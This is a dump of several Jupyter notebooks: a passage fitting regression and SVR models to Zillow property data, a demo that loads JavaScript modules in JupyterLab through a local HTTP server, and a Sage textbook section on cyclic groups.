if data_dropped_nans[col].isnull().sum() > 300000:
data_dropped_nans = data_dropped_nans.drop(col,1)
data_dropped_nans = data_dropped_nans.join(logerror_data, how='outer')
data_dropped_nans = data_dropped_nans.dropna(axis=0, how='any')
data_dropped_nans_noindex = data_dropped_nans.reset_index()
data_dropped_nans_noindex = data_dropped_nans_noindex.drop('parcelid',1)
data_dropped_nans_error = data_dropped_nans_noindex.drop('logerror',1)
logerror = data_dropped_nans_noindex['logerror']
train_x = data_dropped_nans_error.iloc[:45000,:]
test_x = data_dropped_nans_error.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print regr.coef_
predict_y = regr.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
```
Wow !!! A great improvement in results.
```
plt.plot(test_y-predict_y,'ro', ms=1)
plt.show()
```
Scatter plot of the residuals
Now lets try to use SVR (Support Vector Regression) on our above data and see it it improves the result. We will remove the outliers and normalize all the fields for this operation.
```
final_data_noerror = data_dropped_nans.drop('logerror',1)
# Removing the outliers with distance farther than 3*std-dev from mean
final_data_noerror_no_outlier = final_data_noerror[(np.abs(stats.zscore(final_data_noerror)) < 3).all(axis=1)]
# print final_data_noerror_no_outlier
final_data_no_outlier = final_data_noerror_no_outlier.join(logerror_data, how='outer')
final_data_no_outlier = final_data_no_outlier.dropna(axis=0, how='any')
final_data_no_outlier_noindex = final_data_no_outlier.reset_index()
final_data_no_outlier_noindex = final_data_no_outlier_noindex.drop('parcelid',1)
```
Now we'll normalize the data in the cells
```
min_max_scalar = preprocessing.MinMaxScaler()
np_scaled = min_max_scalar.fit_transform(final_data_no_outlier_noindex)
final_data_normalized = pd.DataFrame(np_scaled)
```
Now that we've removed the outliers and normalized the data, let's apply SVR on this model.
```
final_data_svr = final_data_normalized.drop(6,1)
logerror = final_data_normalized[6]
train_x = final_data_svr.iloc[:45000,:]
test_x = final_data_svr.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
clf = SVR(C=1.0, epsilon=0.2)
clf.fit(train_x, train_y)
predict_y = clf.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
```
Let's perform Linear Regression for the same data
```
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print regr.coef_
predict_y = regr.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
```
Linear Regression does pretty well on this filtered data.
|
github_jupyter
|
import pandas as pd
import numpy as np;
import seaborn.apionly as sns
import matplotlib.pyplot as plt
from sklearn import linear_model, preprocessing
from sklearn.metrics import mean_squared_error, r2_score
from sklearn.svm import SVR
from scipy import stats
data = pd.read_csv('data/properties_2016.csv', usecols=['parcelid',
'bedroomcnt',
'buildingqualitytypeid',
'calculatedfinishedsquarefeet',
'numberofstories',
'lotsizesquarefeet',
'taxamount',
], index_col='parcelid')
logerror_data = pd.read_csv('data/train_2016_v2.csv', usecols=['parcelid','logerror'], index_col='parcelid')
data = data.join(logerror_data, how='outer')
data_renamed = data.rename(index=str, columns={'bedroomcnt':'BedCnt',
'buildingqualitytypeid':'BldnQlty',
'calculatedfinishedsquarefeet':'sqFeet',
'numberofstories':'Stories',
'lotsizesquarefeet':'lotsize',
'taxamount':'tax'})
corr = data_renamed.corr()
mask = np.zeros_like(corr, dtype=np.bool) # returns an array of zeros of the same shape and size as corr mat
mask[np.triu_indices_from(mask)] = True # makes the upper triangle of mask as 1
# Set up the matplotlib figure
fig, ax = plt.subplots()
# Draw the heatmap with the mask and correct aspect ratio
vmax = np.abs(corr.values[~mask]).max()
sns.heatmap(corr, mask=mask, cmap=plt.cm.PuOr, vmin=-vmax, vmax=vmax,
square=True, linecolor="lightgray", linewidths=1, ax=ax) # Masks the upper triangle of the heatmap
for i in range(len(corr)):
ax.text(i+0.5,len(corr)-(i+0.5), corr.columns[i],
ha="center", va="center", rotation=45)
for j in range(i+1, len(corr)):
s = "{:.3f}".format(corr.values[i,j])
ax.text(j+0.5,len(corr)-(i+0.5),s,
ha="center", va="center")
ax.axis("off")
plt.show()
data_without_index = data_renamed.reset_index()
sqFeet = data_without_index['sqFeet'][np.logical_not(np.isnan(data_without_index['sqFeet']))]
sqFeet = sqFeet[sqFeet > 100]
plt.plot(sqFeet,'o', ms=1) #ms is an alias for marker size
plt.xlabel('Houses')
plt.ylabel('Total square feet')
plt.show()
plt.plot(sqFeet,'o', ms=1) #ms is an alias for marker size
plt.xlabel('Houses')
plt.ylabel('Total square feet')
axes = plt.gca() # Stands for get the current axis
axes.set_ylim([0,10000])
axes.set_xlim([0,500])
plt.show()
county_arch = pd.read_csv('data/properties_2016.csv', usecols=['regionidcounty','architecturalstyletypeid'])
county_arch['regionidcounty'] = county_arch['regionidcounty'].replace([3101.0, 2061.0, 1286.0],
['Los Angeles', 'Orange', 'Ventura'])
county_arch['regionidcounty'].value_counts(normalize=False, sort=True, dropna=True).plot(kind='pie',autopct='%.2f')
plt.axis('equal')
plt.show()
county_arch_temp = county_arch['architecturalstyletypeid'].value_counts(normalize=False, sort=True, dropna=True)
county_arch_small_values_clubbed = county_arch_temp.head(4)
county_arch_temp = county_arch_temp.reset_index(drop=True)
if len(county_arch_temp) > 4:
county_arch_small_values_clubbed['Others'] = county_arch_temp[4:].sum()
county_arch_small_values_clubbed.plot(kind='pie',autopct='%.2f')
plt.legend()
plt.axis('equal')
plt.show()
area_tax = pd.concat([data_without_index['sqFeet'], data_without_index['tax']], axis=1, keys=['sqFeet', 'tax'])
area_tax['tax'] = area_tax['tax']/1000000
area_tax['sqFeet'] = area_tax[area_tax['sqFeet'] < 17000]['sqFeet']
area_tax = area_tax.dropna(axis=0, how='any')
y,binEdges=np.histogram(area_tax['sqFeet'], weights=area_tax['tax'],bins=100)
bincenters = 0.5*(binEdges[1:]+binEdges[:-1])
plt.plot(bincenters,y,'-')
plt.xlabel('Total Square Feet')
plt.ylabel('Tax Amount/1000000')
plt.title('Line Chart for the distrubution of Tax Amount vs. Total Square Feet', loc='right')
plt.show()
area_error = pd.concat([data_without_index['sqFeet'], data_without_index['logerror']], axis=1, keys=['sqFeet', 'logerror'])
area_error['sqFeet'] = area_error[area_error['sqFeet'] < 17000]['sqFeet']
area_error = area_error.dropna(axis=0, how='any')
plt.hist(area_error['sqFeet'], weights=area_error['logerror'])
plt.show()
reg_area_error = pd.concat([data_without_index['sqFeet'], data_without_index['logerror']], axis=1, keys=['sqFeet', 'logerror'])
reg_area_error['sqFeet'] = reg_area_error[reg_area_error['sqFeet'] < 17000]['sqFeet']
reg_area_error = reg_area_error.dropna(axis=0, how='any')
result = np.polyfit(reg_area_error['sqFeet'], reg_area_error['logerror'],1)
print result
plt.plot(np.log2(reg_area_error['sqFeet']), reg_area_error['logerror'], 'o', ms=1)
plt.plot(np.log2(reg_area_error['sqFeet']), np.polyval(result, np.log2(reg_area_error['sqFeet'])), 'r-')
plt.show()
more_features = pd.read_csv('data/properties_2016.csv', usecols=['parcelid',
'basementsqft',
'bathroomcnt',
'fireplacecnt',
'garagecarcnt',
'garagetotalsqft',
'poolcnt',
'poolsizesum',
'yearbuilt'
], index_col='parcelid')
data = data.join(more_features, how='outer')
data_dropped_nan = data.dropna(axis=0, how='any')
print data_dropped_nan
data_without_nan = data.drop('logerror',1).fillna(data.mean())
data_without_nan = data_without_nan.join(logerror_data, how='outer')
data_without_nan = data_without_nan.dropna(axis=0, how='any')
data_without_nan_noindex = data_without_nan.reset_index()
data_without_nan_noindex = data_without_nan_noindex.drop('parcelid',1)
data_without_logerror = data_without_nan_noindex.drop('logerror',1)
logerror = data_without_nan_noindex['logerror']
train_x = data_without_logerror.iloc[:45000,:]
test_x = data_without_logerror.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print regr.coef_
predict_y = regr.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
data_dropped_nans = data
for col in data_dropped_nans:
if data_dropped_nans[col].isnull().sum() > 300000:
data_dropped_nans = data_dropped_nans.drop(col,1)
data_dropped_nans = data_dropped_nans.join(logerror_data, how='outer')
data_dropped_nans = data_dropped_nans.dropna(axis=0, how='any')
data_dropped_nans_noindex = data_dropped_nans.reset_index()
data_dropped_nans_noindex = data_dropped_nans_noindex.drop('parcelid',1)
data_dropped_nans_error = data_dropped_nans_noindex.drop('logerror',1)
logerror = data_dropped_nans_noindex['logerror']
train_x = data_dropped_nans_error.iloc[:45000,:]
test_x = data_dropped_nans_error.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print regr.coef_
predict_y = regr.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
plt.plot(test_y-predict_y,'ro', ms=1)
plt.show()
final_data_noerror = data_dropped_nans.drop('logerror',1)
# Removing the outliers with distance farther than 3*std-dev from mean
final_data_noerror_no_outlier = final_data_noerror[(np.abs(stats.zscore(final_data_noerror)) < 3).all(axis=1)]
# print final_data_noerror_no_outlier
final_data_no_outlier = final_data_noerror_no_outlier.join(logerror_data, how='outer')
final_data_no_outlier = final_data_no_outlier.dropna(axis=0, how='any')
final_data_no_outlier_noindex = final_data_no_outlier.reset_index()
final_data_no_outlier_noindex = final_data_no_outlier_noindex.drop('parcelid',1)
min_max_scalar = preprocessing.MinMaxScaler()
np_scaled = min_max_scalar.fit_transform(final_data_no_outlier_noindex)
final_data_normalized = pd.DataFrame(np_scaled)
final_data_svr = final_data_normalized.drop(6,1)
logerror = final_data_normalized[6]
train_x = final_data_svr.iloc[:45000,:]
test_x = final_data_svr.iloc[45000:,:]
train_y = logerror.iloc[:45000]
test_y = logerror.iloc[45000:]
clf = SVR(C=1.0, epsilon=0.2)
clf.fit(train_x, train_y)
predict_y = clf.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
regr = linear_model.LinearRegression()
regr.fit(train_x, train_y)
print regr.coef_
predict_y = regr.predict(test_x)
print mean_squared_error(test_y, predict_y)
print r2_score(test_y, predict_y)
| 0.508788 | 0.951953 |
# Loading Javascript modules
## Run it!
* make sure jupyter server proxy is installed
* copy httpserver.py and LoadingJavascriptModules.ipynb in the same directory of a Jupyter Lab server
* create a widgets subdirectory there and copy: main.js and the module subdirectory
* Run the notbook (Kernel -> Restart Kernel And Run All Cells...)
| | |
| --- | --- |
| **You should get this right hand picture** |  |
## What does it do?
* The normal behavior of Jupyter Lab notebook is to have all frontend components pre-loaded
* Some time, experimentation is one use-case, loading frontend components is necessary
* This notebook present a way to load javascript modules dynamically
## Libraries
```
from httpserver import start, stop
from http.server import SimpleHTTPRequestHandler, HTTPServer
import os
from urllib.parse import urlparse, parse_qs
import ipywidgets as widgets
import time
```
## Backend: the HTTP server
### Widgets python implementation
```
logsw=widgets.Textarea(layout=widgets.Layout(width='50%'))
logsw.value = ""
bag ={}
class myHTTPRequestHandler(SimpleHTTPRequestHandler):
callback={}
def __init__(self, *args, directory=None,bag=bag, **kwargs):
self.bag = bag
self.directory = os.path.join(os.getcwd(),"widgets")
super().__init__(*args, directory=self.directory, **kwargs)
# print(self.directory)
def end_headers(self):
super().end_headers()
def do_GET(self):
self.parsed_path = urlparse(self.path)
self.queryparams = parse_qs(self.parsed_path.query)
if self.path.endswith('/version'):
self.version()
elif self.parsed_path.path.endswith('/setvalue'):
self.setvalue()
else:
super().do_GET()
def version(self):
ans = '{"version": "0.0"}'
eans = ans.encode()
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Content-Length",len(eans))
self.end_headers()
self.wfile.write(eans)
def setvalue(self):
self.bag.update({self.queryparams['variable'][0]:self.queryparams['value'][0]})
if self.queryparams['variable'][0] in myHTTPRequestHandler.callback:
self.callback[self.queryparams['variable'][0]](self.queryparams['value'][0])
self.version()
def log_message(self, format, *args):
global logsw
v = format % args
t = time.localtime()
current_time = time.strftime("%H:%M:%S", t)
logsw.value += current_time + " " + v +"\n"
logsw
start(handler_class=myHTTPRequestHandler, port=8085)
```
## Frontend
### Widget javascript implementation
This is the 'basic modules' example you can find [there](https://github.com/mdn/js-examples/tree/master/modules/basic-modules)
The main.js file is slightly changed
```
class LoadModule(object):
"""This class is loading the main.js module"""
def _repr_javascript_(self):
return '''debugger;
var id = document.getElementById("moduleMain")
if (id!=null){
if ('makeIt' in window){
// the module main.js is already loaded
fetch(window.location.origin+'/proxy/8085/setvalue?value=1&variable=loaded')
} else {
console.log("makeIt not found!!!!")
}
} else {
var script= document.createElement('script');
script.src = "/proxy/8085/main.js";
script.type = "module"
script.id = "moduleMain"
document.head.appendChild(script);
function check(){
if (!('makeIt' in window)){
setTimeout(function(){ check()}, 500);
}
}
check()
// sub modules are still not loaded (let them 2 secs)
setTimeout(fetch, 2000, window.location.origin+'/proxy/8085/setvalue?value=1&variable=loaded' )
}
'''
class ExecuteModule(object):
"""This class execute the code once the modul is loaded"""
def _repr_javascript_(self):
return '''
element = document.getElementById("myElement0");
element.innerHTML = "";
makeIt(element);
'''
class DisplayModule(object):
"""This class is creating the element where the output of the will set UI elements"""
def _repr_javascript_(self):
return '''
element.id="myElement0";
// console.log(element);
'''
DisplayModule()
def loaded_cb(value):
display(ExecuteModule())
myHTTPRequestHandler.callback.update({"loaded": loaded_cb})
LoadModule()
#stop()
```
|
github_jupyter
|
from httpserver import start, stop
from http.server import SimpleHTTPRequestHandler, HTTPServer
import os
from urllib.parse import urlparse, parse_qs
import ipywidgets as widgets
import time
logsw=widgets.Textarea(layout=widgets.Layout(width='50%'))
logsw.value = ""
bag ={}
class myHTTPRequestHandler(SimpleHTTPRequestHandler):
callback={}
def __init__(self, *args, directory=None,bag=bag, **kwargs):
self.bag = bag
self.directory = os.path.join(os.getcwd(),"widgets")
super().__init__(*args, directory=self.directory, **kwargs)
# print(self.directory)
def end_headers(self):
super().end_headers()
def do_GET(self):
self.parsed_path = urlparse(self.path)
self.queryparams = parse_qs(self.parsed_path.query)
if self.path.endswith('/version'):
self.version()
elif self.parsed_path.path.endswith('/setvalue'):
self.setvalue()
else:
super().do_GET()
def version(self):
ans = '{"version": "0.0"}'
eans = ans.encode()
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Content-Length",len(eans))
self.end_headers()
self.wfile.write(eans)
def setvalue(self):
self.bag.update({self.queryparams['variable'][0]:self.queryparams['value'][0]})
if self.queryparams['variable'][0] in myHTTPRequestHandler.callback:
self.callback[self.queryparams['variable'][0]](self.queryparams['value'][0])
self.version()
def log_message(self, format, *args):
global logsw
v = format % args
t = time.localtime()
current_time = time.strftime("%H:%M:%S", t)
logsw.value += current_time + " " + v +"\n"
logsw
start(handler_class=myHTTPRequestHandler, port=8085)
class LoadModule(object):
"""This class is loading the main.js module"""
def _repr_javascript_(self):
return '''debugger;
var id = document.getElementById("moduleMain")
if (id!=null){
if ('makeIt' in window){
// the module main.js is already loaded
fetch(window.location.origin+'/proxy/8085/setvalue?value=1&variable=loaded')
} else {
console.log("makeIt not found!!!!")
}
} else {
var script= document.createElement('script');
script.src = "/proxy/8085/main.js";
script.type = "module"
script.id = "moduleMain"
document.head.appendChild(script);
function check(){
if (!('makeIt' in window)){
setTimeout(function(){ check()}, 500);
}
}
check()
// sub modules are still not loaded (let them 2 secs)
setTimeout(fetch, 2000, window.location.origin+'/proxy/8085/setvalue?value=1&variable=loaded' )
}
'''
class ExecuteModule(object):
"""This class execute the code once the modul is loaded"""
def _repr_javascript_(self):
return '''
element = document.getElementById("myElement0");
element.innerHTML = "";
makeIt(element);
'''
class DisplayModule(object):
"""This class is creating the element where the output of the will set UI elements"""
def _repr_javascript_(self):
return '''
element.id="myElement0";
// console.log(element);
'''
DisplayModule()
def loaded_cb(value):
display(ExecuteModule())
myHTTPRequestHandler.callback.update({"loaded": loaded_cb})
LoadModule()
#stop()
| 0.217919 | 0.601535 |
```
%%html
<link href="http://mathbook.pugetsound.edu/beta/mathbook-content.css" rel="stylesheet" type="text/css" />
<link href="https://aimath.org/mathbook/mathbook-add-on.css" rel="stylesheet" type="text/css" />
<style>.subtitle {font-size:medium; display:block}</style>
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,600,600italic" rel="stylesheet" type="text/css" />
<link href="https://fonts.googleapis.com/css?family=Inconsolata:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css" /><!-- Hide this cell. -->
<script>
var cell = $(".container .cell").eq(0), ia = cell.find(".input_area")
if (cell.find(".toggle-button").length == 0) {
ia.after(
$('<button class="toggle-button">Toggle hidden code</button>').click(
function (){ ia.toggle() }
)
)
ia.hide()
}
</script>
```
**Important:** to view this notebook properly you will need to execute the cell above, which assumes you have an Internet connection. It should already be selected, or place your cursor anywhere above to select. Then press the "Run" button in the menu bar above (the right-pointing arrowhead), or press Shift-Enter on your keyboard.
$\newcommand{\identity}{\mathrm{id}}
\newcommand{\notdivide}{\nmid}
\newcommand{\notsubset}{\not\subset}
\newcommand{\lcm}{\operatorname{lcm}}
\newcommand{\gf}{\operatorname{GF}}
\newcommand{\inn}{\operatorname{Inn}}
\newcommand{\aut}{\operatorname{Aut}}
\newcommand{\Hom}{\operatorname{Hom}}
\newcommand{\cis}{\operatorname{cis}}
\newcommand{\chr}{\operatorname{char}}
\newcommand{\Null}{\operatorname{Null}}
\newcommand{\lt}{<}
\newcommand{\gt}{>}
\newcommand{\amp}{&}
$
<div class="mathbook-content"><h2 class="heading hide-type" alt="Section 4.7 Sage"><span class="type">Section</span><span class="codenumber">4.7</span><span class="title">Sage</span></h2><a href="cyclic-sage.ipynb" class="permalink">ยถ</a></div>
<div class="mathbook-content"></div>
<div class="mathbook-content"><p id="p-747">Cyclic groups are very important, so it is no surprise that they appear in many different forms in Sage. Each is slightly different, and no one implementation is ideal for an introduction, but together they can illustrate most of the important ideas. Here is a guide to the various ways to construct, and study, a cyclic group in Sage.</p></div>
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Infinite Cyclic Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Infinite Cyclic Groups</span></h3></div>
<div class="mathbook-content"><p id="p-748">In Sage, the integers $\mathbb Z$ are constructed with <code class="code-inline tex2jax_ignore">ZZ</code>. To build the infinite cyclic group such as $3\mathbb Z$ from Exampleย <a href="section-cyclic-subgroups.ipynb#example-cyclic-z3" class="xref" alt="Example 4.1 " title="Example 4.1 ">4.1</a>, simply use <code class="code-inline tex2jax_ignore">3*ZZ</code>. As an infinite set, there is not a whole lot you can do with this. You can test if integers are in this set, or not. You can also recall the generator with the <code class="code-inline tex2jax_ignore">.gen()</code> command.</p></div>
```
G = 3*ZZ
-12 in G
37 in G
G.gen()
```
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Additive Cyclic Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Additive Cyclic Groups</span></h3></div>
<div class="mathbook-content"><p id="p-749">The additive cyclic group $\mathbb Z_n$ can be built as a special case of a more general Sage construction. First we build $\mathbb Z_{14}$ and capture its generator. Throughout, pay close attention to the use of parentheses and square brackets for when you experiment on your own.</p></div>
```
G = AdditiveAbelianGroup([14])
G.order()
G.list()
a = G.gen(0)
a
```
<div class="mathbook-content"><p id="p-750">You can compute in this group, by using the generator, or by using new elements formed by coercing integers into the group, or by taking the result of operations on other elements. And we can compute the order of elements in this group. Notice that we can perform repeated additions with the shortcut of taking integer multiples of an element.</p></div>
```
a + a
a + a + a + a
4*a
37*a
```
<div class="mathbook-content"><p id="p-751">We can create, and then compute with, new elements of the group by coercing an integer (in a list of length $1$) into the group. You may get a <code class="code-inline tex2jax_ignore">DeprecationWarning</code> the first time you use this syntax to create a new element. The mysterious warning can be safely ignored.</p></div>
```
G([2])
b = G([2]); b
b + b
2*b == 4*a
7*b
b.order()
c = a - 6*b; c
c + c + c + c
c.order()
```
<div class="mathbook-content"><p id="p-752">It is possible to create cyclic subgroups, from an element designated to be the new generator. Unfortunately, to do this requires the <code class="code-inline tex2jax_ignore">.submodule()</code> method (which should be renamed in Sage).</p></div>
```
H = G.submodule([b]); H
H.list()
H.order()
e = H.gen(0); e
3*e
e.order()
```
<div class="mathbook-content"><p id="p-753">The cyclic subgroup <code class="code-inline tex2jax_ignore">H</code> just created has more than one generator. We can test this by building a new subgroup and comparing the two subgroups.</p></div>
```
f = 12*a; f
f.order()
K = G.submodule([f]); K
K.order()
K.list()
K.gen(0)
H == K
```
<div class="mathbook-content"><p id="p-754">Certainly the list of elements, and the common generator of <code class="code-inline tex2jax_ignore">(2)</code> lead us to belive that <code class="code-inline tex2jax_ignore">H</code> and <code class="code-inline tex2jax_ignore">K</code> are the same, but the comparison in the last line leaves no doubt.</p></div>
<div class="mathbook-content"><p id="p-755">Results in this section, especially Theoremย <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-orders" class="xref" alt="Theorem 4.13 " title="Theorem 4.13 ">4.13</a> and Corollaryย <a href="section-cyclic-subgroups.ipynb#corollary-cyclic-modngenerators" class="xref" alt="Corollary 4.14 " title="Corollary 4.14 ">4.14</a>, can be investigated by creating generators of subgroups from a generator of one additive cyclic group, creating the subgroups, and computing the orders of both elements and orders of groups.</p></div>
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Abstract Multiplicative Cyclic Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Abstract Multiplicative Cyclic Groups</span></h3></div>
<div class="mathbook-content"><p id="p-756">We can create an abstract cyclic group in the style of Theoremsย <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-subgroup" class="xref" alt="Theorem 4.3 " title="Theorem 4.3 ">4.3</a>, <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-abelian" class="xref" alt="Theorem 4.9 " title="Theorem 4.9 ">4.9</a>, <a href="section-cyclic-subgroups.ipynb#theorem-cyclic-subgroups" class="xref" alt="Theorem 4.10 " title="Theorem 4.10 ">4.10</a>. In the syntax below <code class="code-inline tex2jax_ignore">a</code> is a name for the generator, and <code class="code-inline tex2jax_ignore">14</code> is the order of the element. Notice that the notation is now multiplicative, so we multiply elements, and repeated products can be written as powers.</p></div>
```
G.<a> = AbelianGroup([14])
G.order()
G.list()
a.order()
```
<div class="mathbook-content"><p id="p-757">Computations in the group are similar to before, only with different notation. Now products, with repeated products written as exponentiation.</p></div>
```
b = a^2
b.order()
b*b*b
c = a^7
c.order()
c^2
b*c
b^37*c^42
```
<div class="mathbook-content"><p id="p-758">Subgroups can be formed with a <code class="code-inline tex2jax_ignore">.subgroup()</code> command. But do not try to list the contents of a subgroup, it'll look strangely unfamiliar. Also, comparison of subgroups is not implemented.</p></div>
```
H = G.subgroup([a^2])
H.order()
K = G.subgroup([a^12])
K.order()
L = G.subgroup([a^4])
H == L
```
<div class="mathbook-content"><p id="p-759">One advantage of this implementation is the possibility to create all possible subgroups. Here we create the list of subgroups, extract one in particular (the third), and check its order.</p></div>
```
allsg = G.subgroups(); allsg
sub = allsg[2]
sub.order()
```
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Cyclic Permutation Groups"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Cyclic Permutation Groups</span></h3></div>
<div class="mathbook-content"><p id="p-760">We will learn more about permutation groups in the next chapter. But we will mention here that it is easy to create cyclic groups as permutation groups, and a variety of methods are available for working with them, even if the actual elements get a bit cumbersome to work with. As before, notice that the notation and syntax is multiplicative.</p></div>
```
G=CyclicPermutationGroup(14)
a = G.gen(0); a
b = a^2
b = a^2; b
b.order()
a*a*b*b*b
c = a^37*b^26; c
c.order()
```
<div class="mathbook-content"><p id="p-761">We can create subgroups, check their orders, and list their elements.</p></div>
```
H = G.subgroup([a^2])
H.order()
H.gen(0)
H.list()
```
<div class="mathbook-content"><p id="p-762">It could help to visualize this group, and the subgroup, as rotations of a regular $12$-gon with the vertices labeled with the integers $1$ through $12\text{.}$ This is not the full group of symmetries, since it does not include reflections, just the $12$ rotations.</p></div>
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Cayley Tables"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Cayley Tables</span></h3></div>
<div class="mathbook-content"><p id="p-763">As groups, each of the examples above (groups and subgroups) have Cayley tables implemented. Since the groups are cyclic, and their subgroups are therefore cyclic, the Cayley tables should have a similar โcyclicโ pattern. Note that the letters used in the default table are generic, and are not related to the letters used above for specific elements โ they just match up with the group elements in the order given by <code class="code-inline tex2jax_ignore">.list()</code>.</p></div>
```
G.<a> = AbelianGroup([14])
G.cayley_table()
```
<div class="mathbook-content"><p id="p-764">If the real names of the elements are not too complicated, the table could be more informative using these names.</p></div>
```
K.<b> = AbelianGroup([10])
K.cayley_table(names='elements')
```
<div class="mathbook-content"><h3 class="heading hide-type" alt="Subsection Complex Roots of Unity"><span class="type">Subsection</span><span class="codenumber" /><span class="title">Complex Roots of Unity</span></h3></div>
<div class="mathbook-content"><p id="p-765">The finite cyclic subgroups of ${\mathbb T}\text{,}$ generated by a primitive $n$th root of unity are implemented as a more general construction in Sage, known as a cyclotomic field. If you concentrate on just the multiplication of powers of a generator (and ignore the infinitely many other elements) then this is a finite cyclic group. Since this is not implemented directly in Sage as a group, <i class="foreign">per se</i>, it is a bit harder to construct things like subgroups, but it is an excellent exercise to try. It is a nice example since the complex numbers are a concrete and familiar construction. Here are a few sample calculations to provide you with some exploratory tools. See the notes following the computations.</p></div>
```
G = CyclotomicField(14)
w = G.gen(0); w
wc = CDF(w)
wc.abs()
wc.arg()/N(2*pi/14)
b = w^2
b.multiplicative_order()
bc = CDF(b); bc
bc.abs()
bc.arg()/N(2*pi/14)
sg = [b^i for i in range(7)]; sg
c = sg[3]; d = sg[5]
c*d
c = sg[3]; d = sg[6]
c*d in sg
c*d == sg[2]
sg[5]*sg[6] == sg[4]
G.multiplication_table(elements=sg)
```
<div class="mathbook-content"><p id="p-766">Notes:</p><ol class="decimal"><li id="li-190"><p id="p-767"><code class="code-inline tex2jax_ignore">zeta14</code> is the name of the generator used for the cyclotomic field, it is a primitive root of unity (a $14$th root of unity in this case). We have captured it as <code class="code-inline tex2jax_ignore">w</code>.</p></li><li id="li-191"><p id="p-768">The syntax <code class="code-inline tex2jax_ignore">CDF(w)</code> will convert the complex number <code class="code-inline tex2jax_ignore">w</code> into the more familiar form with real and imaginary parts.</p></li><li id="li-192"><p id="p-769">The method <code class="code-inline tex2jax_ignore">.abs()</code> will return the modulus of a complex number, $r$ as described in the text. For elements of ${\mathbb C}^\ast$ this should always equal $1\text{.}$</p></li><li id="li-193"><p id="p-770">The method <code class="code-inline tex2jax_ignore">.arg()</code> will return the argument of a complex number, $\theta$ as described in the text. Every element of the cyclic group in this example should have an argument that is an integer multiple of $\frac{2\pi}{14}\text{.}$ The <code class="code-inline tex2jax_ignore">N()</code> syntax converts the symbolic value of <code class="code-inline tex2jax_ignore">pi</code> to a numerical approximation.</p></li><li id="li-194"><p id="p-771"><code class="code-inline tex2jax_ignore">sg</code> is a list of elements that form a cyclic subgroup of order 7, composed of the first 7 powers of <code class="code-inline tex2jax_ignore">b = w^2</code>. So, for example, the last comparison multiplies the fifth power of <code class="code-inline tex2jax_ignore">b</code> with the sixth power of <code class="code-inline tex2jax_ignore">b</code>, which would be the eleventh power of <code class="code-inline tex2jax_ignore">b</code>. But since <code class="code-inline tex2jax_ignore">b</code> has order 7, this reduces to the fourth power.</p></li><li id="li-195"><p id="p-772">If you know a subset of an infinite group forms a subgroup, then you can produce its Cayley table by specifying the list of elements you want to use. Here we ask for a multiplication table, since that is the relevant operation.</p></li></ol></div>
|
github_jupyter
|
%%html
<link href="http://mathbook.pugetsound.edu/beta/mathbook-content.css" rel="stylesheet" type="text/css" />
<link href="https://aimath.org/mathbook/mathbook-add-on.css" rel="stylesheet" type="text/css" />
<style>.subtitle {font-size:medium; display:block}</style>
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400italic,600,600italic" rel="stylesheet" type="text/css" />
<link href="https://fonts.googleapis.com/css?family=Inconsolata:400,700&subset=latin,latin-ext" rel="stylesheet" type="text/css" /><!-- Hide this cell. -->
<script>
var cell = $(".container .cell").eq(0), ia = cell.find(".input_area")
if (cell.find(".toggle-button").length == 0) {
ia.after(
$('<button class="toggle-button">Toggle hidden code</button>').click(
function (){ ia.toggle() }
)
)
ia.hide()
}
</script>
G = 3*ZZ
-12 in G
37 in G
G.gen()
G = AdditiveAbelianGroup([14])
G.order()
G.list()
a = G.gen(0)
a
a + a
a + a + a + a
4*a
37*a
G([2])
b = G([2]); b
b + b
2*b == 4*a
7*b
b.order()
c = a - 6*b; c
c + c + c + c
c.order()
H = G.submodule([b]); H
H.list()
H.order()
e = H.gen(0); e
3*e
e.order()
f = 12*a; f
f.order()
K = G.submodule([f]); K
K.order()
K.list()
K.gen(0)
H == K
G.<a> = AbelianGroup([14])
G.order()
G.list()
a.order()
b = a^2
b.order()
b*b*b
c = a^7
c.order()
c^2
b*c
b^37*c^42
H = G.subgroup([a^2])
H.order()
K = G.subgroup([a^12])
K.order()
L = G.subgroup([a^4])
H == L
allsg = G.subgroups(); allsg
sub = allsg[2]
sub.order()
G=CyclicPermutationGroup(14)
a = G.gen(0); a
b = a^2
b = a^2; b
b.order()
a*a*b*b*b
c = a^37*b^26; c
c.order()
H = G.subgroup([a^2])
H.order()
H.gen(0)
H.list()
G.<a> = AbelianGroup([14])
G.cayley_table()
K.<b> = AbelianGroup([10])
K.cayley_table(names='elements')
G = CyclotomicField(14)
w = G.gen(0); w
wc = CDF(w)
wc.abs()
wc.arg()/N(2*pi/14)
b = w^2
b.multiplicative_order()
